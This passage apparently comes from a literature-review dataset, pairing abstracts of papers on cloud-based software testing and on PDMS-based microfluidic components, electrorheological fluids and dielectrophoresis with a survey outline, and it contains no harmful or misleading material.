storage, and software services that can aid in reducing the execution time of large test suites in a cost-effective manner. However, migrating to the cloud is not without cost, nor is it necessarily the best solution to all testing problems. This paper discusses when to migrate software testing to the cloud from two perspectives: the characteristics of an application under test, and the types of testing performed on the application. --- paper_title: Towards a scalable and robust multi-tenancy SaaS paper_content: Software-as-as-Service (SaaS) is a new approach for developing software, and it is characterized by its multi-tenancy architecture and its ability to provide flexible customization to individual tenant. However, the multi-tenancy architecture and customization requirements have brought up new issues in software, such as database design, database partition, scalability, recovery, and continuous testing. This paper proposes a hybrid test database design to support SaaS customization with two-layer database partitioning. The database is further extended with a new built-in redundancy with ontology so that the SaaS can recover from ontology, data or meta-data failures. Furthermore, constraints in metadata can be used either as test cases or policies to support SaaS continuous testing and policy enforcement. --- paper_title: Evaluating Cloud Platform Architecture with the CARE Framework paper_content: There is an emergence of Cloud application platforms such as Microsoft’s Azure, Google’s App Engine and Amazon’s EC2/SimpleDB/S3. Startups and Enterprise alike, lured by the promise of ‘infinite scalability’, ‘ease of development’, ‘low infrastructure setup cost’ are increasingly using these Cloud service building blocks to develop and deploy their web based applications. However, the precise nature of these Cloud platforms and the resultant Cloud application runtime behavior is still largely an unknown. Given the black box nature of these platforms, and the novel programming and data models of Cloud, there is a dearth of tools and techniques for enabling the rigorously evaluation of Cloud platforms at runtime. This paper introduces the CARE (Cloud Architecture Runtime Evaluation) approach, a framework for evaluating Cloud application development and runtime platforms. CARE implements a unified interface with WSDL and REST in order to evaluate different Cloud platforms for Cloud application hosting servers and Cloud databases. With the unified interface, we are able to perform selective high stress and low stress evaluations corresponding to desired test scenarios. Result shows the effectiveness of CARE in the evaluation of Cloud variations in terms of scalability, availability and responsiveness, across both compute and storage capabilities. Thus placing CARE as an important tool in the path of Cloud computing research. --- paper_title: An environment for evaluation and testing of service workflow schedulers in clouds paper_content: Workflows built through service composition bring new challenges, making the scheduling task even more complex. Besides that, scheduling researchers need a wide range of workflows and their respective services to validate new achievements. In this paper we present a service oriented testbed where experiments can be conducted to develop and evaluate algorithms, heuristics, and scheduling policies for workflows. Our testbed offers an emulator service which allows the workflow characterization through the description of its services. With this, researchers can build workflows which have similar behavior to the real workflow applications, emulating them without the need of implementing all applications and services involved in a real application execution. To demonstrate the utilization of both the testbed and emulator, we conducted workflow executions emulating service workflow applications, such as Montage and LIGO. --- paper_title: An Approach for Service Composition and Testing for Cloud Computing paper_content: As cloud services proliferate, it becomes difficult to facilitate service composition and testing in clouds. In traditional service-oriented computing, service composition and testing are carried out independently. This paper proposes a new approach to manage services on the cloud so that it can facilitate service composition and testing. The paper uses service implementation selection to facilitate service composition similar to Google’s Guice and Spring tools, and apply the group testing technique to identify the oracle, and use the established oracle to perform continuous testing for new services or compositions. The paper extends the existing concept of template based service composition and focus on testing the same workflow of service composition. In addition, all these testing processes can be executed in parallel, and the paper illustrates how to apply service-level MapReduce technique to accelerate the testing process. --- paper_title: YETI on the Cloud paper_content: The York Extensible Testing Infrastructure (YETI) is an automated random testing tool that allows to test programs written in various programming languages. While YETI is one of the fastest random testing tools with over a million method calls per minute on fast code, testing large programs or slow code -- such as libraries using intensively the memory -- might benefit from parallel executions of testing sessions. This paper presents the cloud-enabled version of YETI. It relies on the Hadoop package and its map/reduce implementation to distribute tasks over potentially many computers. This would allow to distribute the cloud version of YETI over Amazon's Elastic Compute Cloud (EC2). --- paper_title: Parallel symbolic execution for structural test generation paper_content: Symbolic execution is a popular technique for automatically generating test cases achieving high structural coverage. Symbolic execution suffers from scalability issues since the number of symbolic paths that need to be explored is very large (or even infinite) for most realistic programs. To address this problem, we propose a technique, Simple Static Partitioning, for parallelizing symbolic execution. The technique uses a set of pre-conditions to partition the symbolic execution tree, allowing us to effectively distribute symbolic execution and decrease the time needed to explore the symbolic execution tree. The proposed technique requires little communication between parallel instances and is designed to work with a variety of architectures, ranging from fast multi-core machines to cloud or grid computing environments. We implement our technique in the Java PathFinder verification tool-set and evaluate it on six case studies with respect to the performance improvement when exploring a finite symbolic execution tree and performing automatic test generation. We demonstrate speedup in both the analysis time over finite symbolic execution trees and in the time required to generate tests relative to sequential execution, with a maximum analysis time speedup of 90x observed using 128 workers and a maximum test generation speedup of 70x observed using 64 workers. --- paper_title: VATS: Virtualized-Aware Automated Test Service paper_content: It is anticipated that by 2015 more than 75% of Information Technology infrastructure will be purchased as a service from service providers. Services will be hosted in virtualized shared resource pools referred to as Clouds. Service providers will need to ensure that customer performance requirements are satisfied while consuming an acceptable quantity of resources. This paper describes a Virtualization-aware Automated Testing Service (VATS). VATS is a framework for automated test execution in Cloud computing environments. It executes tests, manipulates virtualized infrastructure, and collects performance information. VATS uses HP LoadRunner as a load generator and provides the foundation for an automatic performance evaluator for Cloud environments. A case study describes our use of VATS with an SAP R/3 system running in a Xen-based virtualized resource pool. The results from VATS are used to determine the impact of virtual machine configuration parameters on a SAP system. --- paper_title: Leveraging Cloud Platform for Custom Application Development paper_content: Compared with packaged application, custom application developments (CAD) experience the frustration of higher project overhead and less certainty. The typical time spent on building the infrastructure for a CAD project is, on average, several weeks. Project uncertainty comes from unique customer requirements and lack of standardized methods and toolsets to follow. Therefore, a CAD project is more difficult to achieve cost reduction and asset reuse. In this paper, we present a cloud platform to alleviate this problem through an integration of a) standard methods, b) standardized toolsets aligned with those methods, c) project management environments with pre-defined work breakdown structure (WBS) aligned with those methods and toolsets, and d) infrastructure support from the cloud technology. We believe that such a cloud platform will become a fundamental approach for large enterprises to develop CAD or other solutions for their clients. --- paper_title: Environment Modeling for Automated Testing of Cloud Applications paper_content: Recently, cloud computing platforms, such as Microsoft Azure, are available to provide convenient infrastructures such that cloud applications could conduct cloud and data-intensive computing. To ensure high quality of cloud applications under development, developer testing (also referred to as unit testing) could be used. The behavior of a unit in a cloud application is dependent on the test inputs as well as the state of the cloud environment. Generally, manually providing various test inputs and cloud states for conducting developer testing is time-consuming and labor-intensive. To reduce the manual effort, developers could employ automated test generation tools. However, applying an automated test generation tool faces the challenge of generating various cloud states for achieving effective testing, such as achieving high structural coverage of the cloud application since these tools cannot control the cloud environment. To address this challenge, we propose an approach to (1) model the cloud environment for simulating the behavior of the real environment and, (2) apply Dynamic Symbolic Execution (DSE), to both generate test inputs and cloud states to achieve high structural coverage. We apply our approach on some open source Azure cloud applications. The result shows that our approach automatically generates test inputs and cloud states to achieve high structural coverage of the cloud application. ---
Title: A Survey of Software Testing in the Cloud Section 1: INTRODUCTION Description 1: Provide an introduction to cloud computing and its relevance to software testing, discussing the motivations for moving software testing to the cloud and the benefits and challenges associated with it. Section 2: CLOUD COMPUTING Description 2: Describe cloud computing paradigms, essential characteristics, service delivery models, deployment models, and how virtualization plays a role in software testing within the cloud. Section 3: RESEARCH METHODOLOGY Description 3: Explain the methodology used in the research, including the aim to classify cloud-based testing activities, clarify terminology, identify gaps, and address issues in the literature. Section 4: Categorization Description 4: Categorize the papers reviewed based on different criteria such as test levels, test types, contributions, and associated delivery models in cloud computing. Section 5: Gaps Description 5: Identify gaps in existing research, particularly the lack of studies on the effects of different cloud deployment models on software testing as a service, and opportunities for further research. Section 6: Testing for the Cloud Description 6: Define and discuss testing activities specifically for applications developed to run on cloud platforms. Section 7: Testing on the Cloud Description 7: Explore testing activities for on-premise applications that utilize cloud infrastructure for testing purposes. Section 8: RELATED WORK Description 8: Review related research on software testing in the cloud, highlighting the absence of comprehensive literature reviews that categorize existing research by problem and solution domains. Section 9: CONCLUSION Description 9: Summarize the findings, emphasize open research areas, and suggest future research directions to address gaps identified in the survey.
Applications of Micro/Nanoparticles in Microfluidic Sensors: A Review
7
--- paper_title: Dispersion of carbon black in a continuous phase: Electrical, rheological, and morphological studies paper_content: This work investigates the dispersion of carbon black (CB) aggregates into various polymeric matrices to increase electric conductivity. The effect of matrix viscosity on CB morphology and, consequently, on the blend conductivity was thoroughly addressed. The electric conductivity increases from 10–9 to 10–4 when less than 3% CB aggregates were dispersed into the PDMS liquid of various viscosities. The CB threshold loading was found to increase from 1% to 3% as the viscosity rose from 10 cp to 60 000 cp. This finding shows that an ideal loading with CB aggregates is far below that (generally 15%) of a typical pelletized CB loading. Moreover, the microscope and RV tests reveal that CB aggregates diffuse and form an agglomerate-network when the conductivity threshold is reached in a low-viscosity matrix. However, a CB aggregate-network was observed when the threshold value was attained in a high-viscosity matrix. These two mechanisms can be distinguished at approximately 1000 cp. Finally, experimental observation shows that the increase of viscosity during curing does not influence the conductivity of the composite while the CB aggregates dispersed in a thermoset matrix. The minimum viscosity during curing, however, was found to be critical to CB dispersion morphology and, consequently, to ultimate electric conductivity. --- paper_title: High-throughput particle manipulation by hydrodynamic, electrokinetic, and dielectrophoretic effects in an integrated microfluidic chip paper_content: Integrating different steps on a chip for cell manipulations and sample preparation is of foremost importance to fully take advantage of microfluidic possibilities, and therefore make tests faster, cheaper and more accurate. We demonstrated particle manipulation in an integrated microfluidic device by applying hydrodynamic, electroosmotic (EO), electrophoretic (EP), and dielectrophoretic (DEP) forces. The process involves generation of fluid flow by pressure difference, particle trapping by DEP force, and particle redirect by EO and EP forces. Both DC and AC signals were applied, taking advantages of DC EP, EO and AC DEP for on-chip particle manipulation. Since different types of particles respond differently to these signals, variations of DC and AC signals are capable to handle complex and highly variable colloidal and biological samples. The proposed technique can operate in a high-throughput manner with thirteen independent channels in radial directions for enrichment and separation in microfluidic chip. We evaluated our approach by collecting Polystyrene particles, yeast cells, and E. coli bacteria, which respond differently to electric field gradient. Live and dead yeast cells were separated successfully, validating the capability of our device to separate highly similar cells. Our results showed that this technique could achieve fast pre-concentration of colloidal particles and cells and separation of cells depending on their vitality. Hydrodynamic, DC electrophoretic and DC electroosmotic forces were used together instead of syringe pump to achieve sufficient fluid flow and particle mobility for particle trapping and sorting. By eliminating bulky mechanical pumps, this new technique has wide applications for in situ detection and analysis. --- paper_title: An integrated microfluidic system for reaction, high-sensitivity detection, and sorting of fluorescent cells and particles. paper_content: Presented is a novel approach for an integrated micro total analysis system (microTAS) based on a microfluidic on-chip device that supports ultrasensitive confocal detection of fluorescent cells and particles and subsequently allows for their precise sorting in the fluid phase with respect to spectroscopic properties, such as brightness and color. The hybrid silicone elastomer/glass chip first comprises a branched channel system to initiate fluid mixing and to hydrodynamically focus the sample solution down to a thin flow layer, matching the size of the confocal detection volume placed at that position and, thus, providing a high detection efficiency. In the subsequent on-chip module, the dispersed cells or particles can be sorted into two different output channels. The sorting process is realized by a perpendicular deflection stream that can be switched electrokinetically. The performance of the automated sorting routine is demonstrated by precise partition of a mixture of differently colored fluorescent beads. Moreover, the specifically branched channel geometry allows for direct implementation of reaction steps prior to detection and sorting, which is demonstrated by inducing a selective recognition reaction between the fluorescent protein R-phycoerythrin and a mixture of live bacterial cells exhibiting or lacking the respective surface antigens. --- paper_title: Microfluidic devices fabricated in Poly(dimethylsiloxane) for biological studies paper_content: This review describes microfluidic systems in poly(dimethylsiloxane) (PDMS) for biological studies. Properties of PDMS that make it a suitable platform for miniaturized biological studies, techniques for fabricating PDMS microstructures, and methods for controlling fluid flow in microchannels are discussed. Biological procedures that have been miniaturized into PDMS-based microdevices include immunoassays, separation of proteins and DNA, sorting and manipulation of cells, studies of cells in microchannels exposed to laminar flows of fluids, and large-scale, combinatorial screening. The review emphasizes the advantages of miniaturization for biological analysis, such as efficiency of the device and special insights into cell biology. --- paper_title: Logic control of microfluidics with smart colloid. paper_content: We report the successful realization of a microfluidic chip with switching and corresponding inverting functionalities. The chips are identical logic control components incorporating a type of smart colloid, giant electrorheological fluid (GERF), which possesses reversible characteristics via a liquid-solid phase transition under external electric field. Two pairs of electrodes embedded on the sides of two microfluidic channels serve as signal input and output, respectively. One, located in the GERF micro-channel is used to control the flow status of GERF, while another one in the ither micro-fluidic channel is used to detect the signal generated with a passing-by droplet (defined as a signal droplet). Switching of the GERF from the suspended state (off-state) to the flowing state (on-state) or vice versa in the micro-channel is controlled by the appearance of signal droplets whenever they pass through the detection electrode. The output on-off signals can be easily demonstrated, clearly matching with GERF flow status. Our results show that such a logic switch is also a logic IF gate, while its inverter functions as a NOT gate. --- paper_title: Polydimethylsiloxane-based conducting composites and their applications in microfluidic chip fabrication. paper_content: This paper reviews the design and fabrication of polydimethylsiloxane (PDMS)-based conducting composites and their applications in microfluidic chip fabrication. Owing to their good electrical conductivity and rubberlike elastic characteristics, these composites can be used variously in soft-touch electronic packaging, planar and three-dimensional electronic circuits, and in-chip electrodes. Several microfluidic components fabricated with PDMS-based composites have been introduced, including a microfluidic mixer, a microheater, a micropump, a microdroplet controller, as well as an all-in-one microfluidic chip. --- paper_title: Nanocomposite Carbon‐PDMS Material for Chip‐Based Electrochemical Detection paper_content: This paper presents an alternative approach to create low-cost and patternable carbon electrodes suitable for microfluidic devices. The fabrication and the electrochemical performances of electrodes made of Polydimethylsiloxane doped with commercially available carbon black (C-PDMS) are described. Conductivity and electrochemical measurements performed on various carbon to PDMS ratios showed that electrodes with suitable electrochemical properties were obtained with a ratio of 25 %. --- paper_title: Characterizing and Patterning of PDMS-Based Conducting Composites** paper_content: In recent years, there has been considerable progress on fabricating microfluidic devices with multiple functionalities, with the goal of attaining lab-on-a-chip [1–3] integration. These efforts have benefited from the development of microfabrication technologies such as soft lithography. [4] In this context the material polydimethylsiloxane (PDMS) has played an important role, not only serving as the stamp for pattern transfer, but also as an unique material in chip fabrication owing to its properties such as transparency, biocompatibility, and good flexibility. [5] Because such microfluidic devices may be constructed using simple manufacturing techniques such as micromolding, they are generally inexpensive to produce. By employing PDMS, micropumps, valves, mixer/reactors, and other components have been integrated into all-in-one chips with complex functionalities, used in chemical reactions, bio-analysis, drug discovery, etc. [2] However, PDMS is a non-conducting polymer, on which patterning metallic structures during the fabrication of microdevices is challenging due to the weak adhesion between the metal and PDMS. Hence, the integration of conducting structures into bulk PDMS has been a critical issue, especially for those applications such as electrokinetic micropumps, microsensors, microheaters, electro-rheological (ER) actuators, etc., [6–8] which require electrodes for control and signal detection. Patterning metallic structures is popular in microelectronics, but the metals cannot adhere to PDMS strongly due to the low surface energy of PDMS. Lee et al. reported the transfer and subsequent embedding of thin films of gold patterns into PDMS via chemical adhesion mediated by a silane coupling agent. [9] Lim et al. [10] developed a method of transferring and stacking metal layers onto a PDMS substrate by using serial and selective etching techniques. However, the incompatibility between PDMS and the metal usually caused failures in the fabrication process, especially in the bonding of thin layers. To minimize the difference in material properties, other conductive materials were considered. Gawron et al. reported the embedding of thin carbon fibers into PDMS-based microchips for capillary electrophoresis detection. [11] Carbon --- paper_title: A Simple Water-Based Synthesis of Au Nanoparticle/PDMS Composites for Water Purification and Targeted Drug Release paper_content: AuNP/PDMS nanocomposites have been synthesized in the form of gels, foams, and films with distinctive structure and morphology. A simple in situ process in aqueous medium for the formation of such composite materials is described. The nanoparticles are held firmly within the PDMS while still being chemically accessible to substances soluble in PDMS. We demonstrate the utility of this property for water purification applications such as removing aromatic solvents and sulfur-containing contaminants from water. The contaminants can be freed from the composite with a simple thermal treatment, allowing the material to be reused. We also demonstrate chemically selective uptake and release of a fluorescent dye by the nanocomposite as a drug delivery model system. --- paper_title: Electrical conductivity and Young"s modulus of flexible nanocomposites made by metal ion implantation of Polydimethylsiloxane: the relationship between nanostructure and macroscopic properties paper_content: The mechanical and electrical properties of nanocomposites created by gold and titanium implantation into Polydimethysiloxane (PDMS) are reported for doses from 1015 at/cm2 to 5x1016 at/cm2, and for ion energies of 2.5 keV, 5 keV and 10 keV. TEM cross-section micrographs allowed detailed microstructural analysis of the implanted layers. Gold ions penetrate up to 30 nm and form crystalline nanoparticles whose size increases with ion dose and energy. Titanium forms a nearly homogeneous amorphous composite with the PDMS up to 18 nm thick. Using TEM micrographs, the metal volume fraction of the composite was accurately determined, allowing both electrical conductivity and the Young’s modulus to be plotted vs. the volume fraction, enabling quantitative use of percolation theory for nanocomposites less than 30 nm in thickness. This allows linking the composite’s Young’s modulus and conductivity directly to the implantation parameters and volume fraction. Electrical and mechanical properties were measured on the same nanocomposite samples, and different percolation thresholds and exponents were found, showing that while percolation explains very well both conduction and stiffness of the composite, the interaction between metal nanoparticles occurs differently for determining mechanical and electrical properties. --- paper_title: Polydimethylsiloxane-based conducting composites and their applications in microfluidic chip fabrication. paper_content: This paper reviews the design and fabrication of polydimethylsiloxane (PDMS)-based conducting composites and their applications in microfluidic chip fabrication. Owing to their good electrical conductivity and rubberlike elastic characteristics, these composites can be used variously in soft-touch electronic packaging, planar and three-dimensional electronic circuits, and in-chip electrodes. Several microfluidic components fabricated with PDMS-based composites have been introduced, including a microfluidic mixer, a microheater, a micropump, a microdroplet controller, as well as an all-in-one microfluidic chip. --- paper_title: Microdroplet-based universal logic gates by electrorheological fluid paper_content: We demonstrate a uniquely designed microfluid logic gate with universal functionality, which is capable of conducting all 16 logic operations in one chip, with different input voltage combinations. A kind of smart colloid, giant electrorheological (GER) fluid, functions as the translation media among fluidic, electronic and mechanic information, providing us with the capability of performing large integrations either on-chip or off-chip, while the on-chip hybrid circuit is formed by the interconnection of the electric components and fluidic channels, where the individual microdroplets travelling in a channel represents a bit. The universal logic gate reveals the possibilities of achieving a large-scale microfluidic processor with more complexity for on-chip processing for biological, chemical as well as computational experiments. --- paper_title: Electrorheological-fluid-based microvalves paper_content: We present the successful design and fabrication of push-and-pull microvalves that use a giant electrorheological (GER) fluid. Our multilayer microvalves, including the GER fluid control channel, the electrode, the flow channel, and the flexible membrane, are fabricated with polydimethylsioxane-based materials by soft lithography techniques. The GER effect is able to provide high-pressure changes in GER control channel so as to fully close and open an associated flow channel. The fast response time of the GER fluid and the push-and-pull valve design adopted assure fast switching time of the valve less than 10ms and sound reliability. This GER-fluid-based microvalve has other advantages of easy fabrication and biocompatibility and is suitable for most microfluidic applications. --- paper_title: Universal logic gates via liquid-electronic hybrid divider paper_content: We demonstrated two-input microdroplet-based universal logic gates using a liquid-electronic hybrid divider. All 16 Boolean logic functions have been realized by manipulating the applied voltages. The novel platform consists of a microfluidic chip with integrated microdroplet detectors and external electronic components. The microdroplet detectors act as the communication media for fluidic and electronic information exchange. The presence or absence of microdroplets at the detector translates into the binary signal 1 or 0. The embedded micro-mechanical pneumatically actuated valve (PAV), fabricated using the well-developed multilayer soft lithography technique, offers biocompatibility, flexibility and accuracy for the on-chip realization of different logic functions. The microfluidic chip can be scaled up to construct large-scale microfluidic logic computation. On the other hand, the microfluidic chip with a specific logic function can be applied to droplet-based chemical reactions for on-demand bio or chemical analysis. Our experimental results have presented an autonomously driven, precision-controlled microfluidic chip for chemical reactions based on the IF logic function. --- paper_title: Polydimethylsiloxane-integratable micropressure sensor for microfluidic chips. paper_content: A novel microfluidic pressure sensor which can be fully integrated into polydimethylsiloxane (PDMS) is reported. The sensor produces electrical signals directly. We integrated PDMS-based conductive composites into a 30 μm thick membrane and bonded it to the microchannel side wall. The response time of the sensor is approximately 100 ms and can work within a pressure range as wide as 0–100 kPa. The resolution of this micropressure sensor is generally 0.1 kPa but can be increased to 0.01 kPa at high pressures as a result of the quadratic relationship between resistance and pressure. The PDMS-based nature of the sensor ensures its perfect bonding with PDMS chips, and the standard photolithographic process of the sensor allows one-time fabrication of three dimensional structures or even microsensor arrays. The theoretical calculations are in good agreement with experimental observations. --- paper_title: Electrorheological fluid-actuated microfluidic pump paper_content: The authors report the design and implementation of an electrorheological (ER) fluid-actuated microfluidic pump, with programmable digital control. Our microfluidic pump has a multilayered structure fabricated on polydimethylsiloxane by soft-lithographic technique. The ER microfluidic pump exhibits good performance at high pumping frequencies and uniform liquid flow characteristics. It can be easily integrated with other microfluidic components. The programmable control also gives the device flexibility in its operations. --- paper_title: Active microfluidic mixer chip paper_content: We report the design and fabrication of a chaotic mixer based on the electrorheological (ER) fluid-controlled valves. The flow in the main channel is perturbed by liquid flow in orthogonal side channels, driven by hydrodynamic pulsating pumps. Each pulsating pump consists of a chamber with diaphragm plus two out-of-phase ER valves operating in a push-pull mode. All the valves, pumps, and mixing channels are integrated in one polydimethylsioxane chip. Mixing characteristics in the main channel are controlled by the strength and frequency of external electric fields applied on the ER fluid. --- paper_title: Electrorheological fluids: smart soft matter and characteristics paper_content: An electrorheological fluid, a special type of suspension with controllable fluidity by an electric field, generally contains semiconducting or polarizable materials as electro-responsive parts. These materials align in the direction of the applied electric field to generate a solid-like phase in the suspension. These electro-responsive smart materials, including dielectric inorganics, semiconducting polymers and their hybrids, and polymer/inorganic composites, are reviewed in terms of their mechanism, rheological analysis and dielectric characteristics. --- paper_title: The giant electrorheological effect in suspensions of nanoparticles paper_content: Electrorheology (ER) denotes the control of a material's flow properties (rheology) through an electric field1,2,3,4,5,6,7,8,9,10. We have fabricated electrorheological suspensions of coated nanoparticles that show electrically controllable liquid–solid transitions. The solid state can reach a yield strength of 130 kPa, breaking the theoretical upper bound on conventional ER static yield stress that is derived on the general assumption that the dielectric and conductive responses of the component materials are linear. In this giant electrorheological (GER) effect, the static yield stress displays near-linear dependence on the electric field, in contrast to the quadratic variation usually observed11,12,13,14,15,16. Our GER suspensions show low current density over a wide temperature range of 10–120 °C, with a reversible response time of <10 ms. Finite-element simulations, based on the model of saturation surface polarization in the contact regions of neighbouring particles, yield predictions in excellent agreement with experiment. --- paper_title: Review Article—Dielectrophoresis: Status of the theory, technology, and applications paper_content: A review is presented of the present status of the theory, the developed technology and the current applications of dielectrophoresis (DEP). Over the past 10 years around 2000 publications have addressed these three aspects, and current trends suggest that the theory and technology have matured sufficiently for most effort to now be directed towards applying DEP to unmet needs in such areas as biosensors, cell therapeutics, drug discovery, medical diagnostics, microfluidics, nanoassembly, and particle filtration. The dipole approximation to describe the DEP force acting on a particle subjected to a nonuniform electric field has evolved to include multipole contributions, the perturbing effects arising from interactions with other cells and boundary surfaces, and the influence of electrical double-layer polarizations that must be considered for nanoparticles. Theoretical modelling of the electric field gradients generated by different electrode designs has also reached an advanced state. Advances in the technology include the development of sophisticated electrode designs, along with the introduction of new materials (e.g., silicone polymers, dry film resist) and methods for fabricating the electrodes and microfluidics of DEP devices (photo and electron beam lithography, laser ablation, thin film techniques, CMOS technology). Around three-quarters of the 300 or so scientific publications now being published each year on DEP are directed towards practical applications, and this is matched with an increasing number of patent applications. A summary of the US patents granted since January 2005 is given, along with an outline of the small number of perceived industrial applications (e.g., mineral separation, micropolishing, manipulation and dispensing of fluid droplets, manipulation and assembly of micro components). The technology has also advanced sufficiently for DEP to be used as a tool to manipulate nanoparticles (e.g., carbon nanotubes, nano wires, gold and metal oxide nanoparticles) for the fabrication of devices and sensors. Most efforts are now being directed towards biomedical applications, such as the spatial manipulation and selective separation/enrichment of target cells or bacteria, high-throughput molecular screening, biosensors, immunoassays, and the artificial engineering of three-dimensional cell constructs. DEP is able to manipulate and sort cells without the need for biochemical labels or other bioengineered tags, and without contact to any surfaces. This opens up potentially important applications of DEP as a tool to address an unmet need in stem cell research and therapy. --- paper_title: A novel method to construct 3D electrodes at the sidewall of microfluidic channel paper_content: We report a simple, low-cost and novel method for constructing three-dimensional (3D) microelectrodes in microfluidic system by utilizing low melting point metal alloy. Three-dimensional electrodes have unique properties in application of cell lysis, electro-osmosis, electroporation and dielectrophoresis. The fabrication process involves conventional photolithography and sputtering techniques to fabricate planar electrodes, positioning bismuth (Bi) alloy microspheres at the sidewall of PDMS channel, plasma bonding and low temperature annealing to improve electrical connection between metal microspheres and planar electrodes. Compared to other fabrication methods for 3D electrodes, the presented one does not require rigorous experimental conditions, cumbersome processes and expensive equipments. Numerical analysis on electric field distribution with different electrode configurations was presented to verify the unique field distribution of arc-shaped electrodes. The application of 3D electrode configuration with high-conductive alloy microspheres was confirmed by particle manipulation based on dielectrophoresis. The proposed technique offers alternatives to construct 3D electrodes from 2D electrodes. More importantly, the simplicity of the fabrication process provides easy ways to fabricate electrodes fast with arc-shaped geometry at the sidewall of microchannel. --- paper_title: Continuous manipulation and separation of particles using combined obstacle- and curvature-induced direct current dielectrophoresis paper_content: This paper presents a novel dielectrophoresis-based microfluidic device incorporating round hurdles within an S-shaped microchannel for continuous manipulation and separation of microparticles. Local nonuniform electric fields are generated due to the combined effects of obstacle and curvature, which in turn induce negative dielectrophoresis forces exerting on the particle that transport throughout the microchannel electrokinetically. Experiments were conducted to demonstrate the controlled trajectories of fix-sized (i.e. 10 or 15x μm) polystyrene particles, and size-dependent separation of 10 and 15 μm particles by adjusting the applied voltages at the inlet and outlets. Numerical simulations were also performed to predict the particle trajectories, which showed reasonable agreement with experimentally observed results. Compared to other microchannel designs that make use of either obstacle or curvature individually for inhomogeneous electric fields, the developed microchannel offers advantages such as improved controllability of particle motion, lower requirement of applied voltage, reduced fouling, and particle adhesion, etc. --- paper_title: Continuous particle focusing in a waved microchannel using negative dc dielectrophoresis paper_content: We present a waved microchannel for continuous focusing of microparticles and cells using negative direct current (dc) dielectrophoresis. The waved channel is composed of consecutive s-shaped curved channels in series to generate an electric field gradient required for the dielectrophoretic effect. When particles move electrokinetically through the channel, the experienced negative dielectrophoretic forces alternate directions within two adjacent semicircular microchannels, leading to a focused continuous-flow stream along the channel centerline. Both the experimentally observed and numerically simulated results of the focusing performance are reported, which coincide acceptably in proportion to the specified dimensions (i.e. inlet and outlet of the waved channel). How the applied electric field, particle size and medium concentration affect the performance was studied by focusing polystyrene microparticles of varying sizes. As an application in the field of biology, the focusing of yeast cells in the waved mcirochannel was tested. This waved microchannel shows a great potential for microflow cytometry applications and is expected to be widely used before different processing steps in lab-on-a-chip devices with integrated functions. --- paper_title: Polydimethylsiloxane-based conducting composites and their applications in microfluidic chip fabrication. paper_content: This paper reviews the design and fabrication of polydimethylsiloxane (PDMS)-based conducting composites and their applications in microfluidic chip fabrication. Owing to their good electrical conductivity and rubberlike elastic characteristics, these composites can be used variously in soft-touch electronic packaging, planar and three-dimensional electronic circuits, and in-chip electrodes. Several microfluidic components fabricated with PDMS-based composites have been introduced, including a microfluidic mixer, a microheater, a micropump, a microdroplet controller, as well as an all-in-one microfluidic chip. --- paper_title: Valveless impedance micropump with integrated magnetic diaphragm. paper_content: This study presents a planar valveless impedance-based micropump for biomedical applications comprising a lower glass substrate patterned with a copper micro-coil, a microchannel, an upper glass cover plate, and a PDMS diaphragm with an electroplated magnet on its upper surface. When a current is passed through the micro-coil, an electromagnetic force is established between the coil and the magnet. The resulting deflection of the PDMS diaphragm creates an acoustic impedance mismatch within the microchannel, which in turn produces a net flow. The performance of the micropump is characterized experimentally. The experimental results show that a maximum diaphragm deflection of 30 microm is obtained when the micro-coil is supplied with an input current of 0.5 A. The corresponding flow rate is found to be 1.5 microl/sec when the PDMS membrane is driven by an actuating frequency of 240 Hz. --- paper_title: Magnetically Actuated Patterns for Bioinspired Reversible Adhesion (Dry and Wet) paper_content: DOI: 10.1002/adma.201303087 Over the last decade the unique “strong but reversible” characteristics of gecko’s and tree frog’s adhesive pads have been intensively investigated both in the natural systems and artificial mimics.[1,2] Whereas adhesive strength in the natural systems has been matched and even surpassed with synthetic micro and nanostructured surfaces,[3,4] strategies to effectively switch between adhesive and non adhesive states, drastically or gradually, are still scarce and limited either in performance or by the complexity of the preparation method.[5–9] Reversibility in patterned adhesives relies on a significant surface pattern reorganisation via application of an external stimulus. In artificial systems this has been achieved by temperature changes using patterns of responsive polymer materials (shape memory polymers[5] and liquid crystalline polymers[6]) or by mechanical stretching of wrinkled patterns supported by elastomeric films.[7–9] Switching adhesion with temperature based methods is slow and cannot be tuned. Adhesion changes by mechanical forces only work on stretchable films and the principle is not applicable when these are supported by rigid solids.[7–9] Methods for reversible and tunable adhesion controlled by noncontact external stimuli (temperature, light, etc.) remain a scientific and technical challenge. Polymer-based magnetically actuated microcomponents have been reported to undergo predesigned, complex twoand threedimensional motions upon application of magnetic fields.[10–12] Elastomeric materials filled with magnetic nanoparticles shaped in different microgeometries by soft moulding methods have been reported, including pillar patterns.[11,13–15] These structures have been applied in microfluidics,[15] for inducing localized traction forces to cells[11,13] and to generate anisotropic motion of microsized objects.[10] However, all these examples are based on either small movements or movement of isolated components. None of the reported cases allow homogeneous, robust and strong magnetic-driven movement of microcomponents over large areas, which is a prerequisite for efficient switching of adhesion on structured surfaces. Here we report on a facile strategy to obtain magnetically actuated arrays of micropillars able to undergo reversible, homogeneous, drastic and tunable geometrical changes upon application of a magnetic field with variable strength. We demonstrate, for the first time, a magnetically tunable adhesive that works under dry and wet conditions. Arrays of magnetic micropillars with 47 μm height and 18 μm diameter were obtained by soft moulding[16–18] using PDMS precursors containing NdFeB microparticles (see Figure 1 and Experimental Section for details). A drop of magnetic PDMS precursor was cast on the mould and a suitable magnetic field gradient was applied by placing the mould on top of a permanent magnet. In this way, the microparticles accumulated inside the pillars, where the magnetic field gradient was stronger (Figure 1, step 1). This step was crucial for a homogeneous and strong magnetic response of the pillars across the pattern. The residual magnetic PDMS layer on the mould was scraped off and a previously cured PDMS thin film was pressed against the mould (Figure 1, step 2). A non magnetic backing layer is important in order to avoid interfering magnetic interaction with the pillars. The sandwich PDMS mould/PDMS-NdFeB/PDMS film (Figure 1) was cured in an oven and then placed in a strong homogeneous magnet for magnetizing the embedded NdFeB particles (Figure 1, step 3). Control patterns were also prepared where the magnetization step was omitted. After demoulding, homogeneous arrays of magnetic micropillars supported by a non magnetic backing layer were obtained (Supporting Information (SI) Figure SI-1). The microparticles were homogeneously distributed along the pillars, as observed by optical microscopy (Figure 1). Alternatively the sandwich PDMS mould/PDMS-NdFeB/PDMS film was magnetized before curing and then placed on a magnet in order to attract the highly magnetized microparticles in the fluid PDMS to the top of the pillars (Figure SI-2). However, in this case irreversible stick of neighbouring pillars was typically observed after demoulding. This was a consequence of the high concentration of magnetized particles at the top of the pillars, which makes neighbouring pillars to behave like two interacting micromagnets (Figure SI-3). For this reason this method was rejected in the following studies. In order to test the magnetic response of the micropillars, a cylindrical NdFeB permanent magnet 